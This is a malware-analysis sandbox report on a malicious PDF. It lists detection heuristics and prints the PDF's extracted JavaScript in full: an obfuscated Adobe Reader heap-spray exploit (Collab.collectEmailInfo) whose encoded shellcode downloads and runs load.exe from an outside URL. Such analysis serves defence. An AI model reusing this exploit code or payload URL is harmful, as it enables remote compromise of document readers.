MALICIOUS
250
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT and PDF_JS. The JavaScript stream, identified as 'javascript_obj0013_001.js', is further flagged for suspicious content and obfuscation. The presence of an unescape() call suggests the script is likely obfuscated to hide its malicious intent, which is probably to download and execute a second-stage payload. Due to the obfuscation, the exact payload and delivery mechanism cannot be confidently determined.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 7
-
JavaScript action low 4 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Obfuscated multi-stage PDF JavaScript heap-spray exploit critical PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAYPDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
var Ypgq8w8T = 0x0c0c0c0c; var o9rHiui = unescape("%u9090%u9090%u9090%u0FEB%u335B%u66C9%u80B9%u8001%u1133%uE243%uEBFA%uE805%uFFEC%uFFFF%u7581%u21B0%u1111%u9A11%u1D51%u619A%uBC0D%u619A%u9019%u11FD%u1115%u9A11%u47FD%u9F79%u1F5F%uF9FD%u11EF%u1111%u5498%u4715%u8979%u9BEF%uF91F%u11E1%u1111%u5498%u4719%u3479%uEEA1%uF9D3%u11F3%u1111%u5498%u471D%uFE79%uF1DF%uF971%u11C5%u1111%u5498%u4701%uD079%uF468%uF9A9%u11D7%u1111%u5498%u5105%u2991%u64D2%u98EB%u0954%u16F8%u1110%u4F11%u6498%u9A35%u1554%u107B%u9A48%u0944%uF947%u119A%u1111%u794 … var J41KQnug = 0x400000; -
PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URLDecoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://buterik.com/123/load.exe Referenced by PDF JavaScript
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0013_001.js |
pdf-javascript-stream | PDF /JS object 13 at offset 0x36A | 2929 bytes |
SHA-256: ecb75181857f4fd7e8bbcd9513eab5e4d6d9c4eaffda911e2ffa75b4d2b3009e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 3 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function ONESFhVr2po5() { var KIqyvfMT7kDO4 = new Array();
function dgxKRL(eaFPSHFGMX7eO5, OQ40B) {
while (eaFPSHFGMX7eO5.length*2<OQ40B){eaFPSHFGMX7eO5 += eaFPSHFGMX7eO5;}
eaFPSHFGMX7eO5 = eaFPSHFGMX7eO5.substring(0,OQ40B/2);
return eaFPSHFGMX7eO5;
}
function NEThvR2Mna() {
var Ypgq8w8T = 0x0c0c0c0c;
var o9rHiui = unescape("%u9090%u9090%u9090%u0FEB%u335B%u66C9%u80B9%u8001%u1133%uE243%uEBFA%uE805%uFFEC%uFFFF%u7581%u21B0%u1111%u9A11%u1D51%u619A%uBC0D%u619A%u9019%u11FD%u1115%u9A11%u47FD%u9F79%u1F5F%uF9FD%u11EF%u1111%u5498%u4715%u8979%u9BEF%uF91F%u11E1%u1111%u5498%u4719%u3479%uEEA1%uF9D3%u11F3%u1111%u5498%u471D%uFE79%uF1DF%uF971%u11C5%u1111%u5498%u4701%uD079%uF468%uF9A9%u11D7%u1111%u5498%u5105%u2991%u64D2%u98EB%u0954%u16F8%u1110%u4F11%u6498%u9A35%u1554%u107B%u9A48%u0944%uF947%u119A%u1111%u7941%u0B27%u613E%u86F9%u1111%u9811%u0D54%uD49A%uD192%u9841%u3154%uEE79%u1111%u4111%u549A%u7B05%u4813%u449A%uF909%u1170%u1111%u5412%uD631%u4D11%u3F6F%uD674%u1551%u7469%u1111%u64EE%u9A31%u1D54%u107B%u9A48%u0944%u51F9%u1111%u7B11%u4916%u5412%u2235%u42CA%uEE42%u3164%u4241%u549A%u7B0D%u4814%u449A%uF909%u1132%u1111%u117B%u64EE%u9A31%u1954%u137B%u9A48%u0944%u01F9%u1111%u7B11%u9AEE%u0154%u107B%u9A48%u0944%u11F9%u1111%u5011%u434A%uF012%uF012%uF012%uF012%uFD92%u4B15%u9A42%uF3CB%u43E6%uF1EE%u9A44%u9AFD%u196C%u4C9A%u471D%u629A%u9A2D%u0F65%u1269%u47E2%u679A%u1231%u22E2%u58D8%uBC50%uD212%u2247%u1EE7%u01AF%uE32B%u1965%uDFD0%u121C%u51E3%uE0FA%uEF2A%u644F%u4BF4%uFA9A%u4B9A%u1235%u77CC%u1D9A%u9A5A%u0D4B%uCC12%u159A%u129A%u4FD4%uD34C%u1119%uE5F9%uEEEF%u44EE%u5D43%u5E5C%u115F%u7468%u7074%u2F3A%u622F%u7475%u7265%u6B69%u632E%u6D6F%u312F%u3332%u6C2F%u616F%u2E64%u7865%u0065");
var J41KQnug = 0x400000;
var KM3rJALmNTef = o9rHiui.length * 2;
var OQ40B = J41KQnug - (KM3rJALmNTef+0x38);
var eaFPSHFGMX7eO5 = unescape("%u9090%u9090");
eaFPSHFGMX7eO5 = dgxKRL(eaFPSHFGMX7eO5, OQ40B);
var ZOydI4ERbX = (Ypgq8w8T - 0x400000)/J41KQnug;
for (var ct5b9=0;ct5b9<ZOydI4ERbX;ct5b9++) {
KIqyvfMT7kDO4[ct5b9] = eaFPSHFGMX7eO5 + o9rHiui;
}
}
function OruPmbaXydP() {
var Xk4BDirPHFOuY = app.viewerVersion.toString();
Xk4BDirPHFOuY = Xk4BDirPHFOuY.replace(/\D/g,"");
var cz4gTe = new Array(Xk4BDirPHFOuY.charAt(0),Xk4BDirPHFOuY.charAt(1),Xk4BDirPHFOuY.charAt(2));
var xeJO3D = "c8o8l5l555e2c424t234534E6ma45678il31In1f3457o";
if ((cz4gTe[0] == 8 &&
((cz4gTe[1] == 1 && cz4gTe[2] < 2) || cz4gTe[1] < 1)) ||
(cz4gTe[0] == 7 && cz4gTe[1] < 1) ||
(cz4gTe[0] < 7)) {
var B1JHE = Collab;
NEThvR2Mna();
var N4K1eryIG = unescape("%u0c0c%u0c0c");
var NLwX2QBZp = "c24ol2la572bS8to2445r5e00";
while(N4K1eryIG.length < 44952) N4K1eryIG += N4K1eryIG;
this[NLwX2QBZp.replace(new RegExp(/\d/g),"")] = B1JHE[xeJO3D.replace(new RegExp(/\d/g),"")]( {subj: "", msg: N4K1eryIG});
}
}
OruPmbaXydP();}
|
|||
javascript_obj0013_001_shellcode_00.bin |
pdf-js-shellcode | pdf-js-unescape-shellcode recovered from PDF /JS object 13 at offset 0x36A | 444 bytes |
SHA-256: bcb2470f54ff4d180f2f1d8ee994554fbbb7541e67bae743de98e7713ac34a25 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.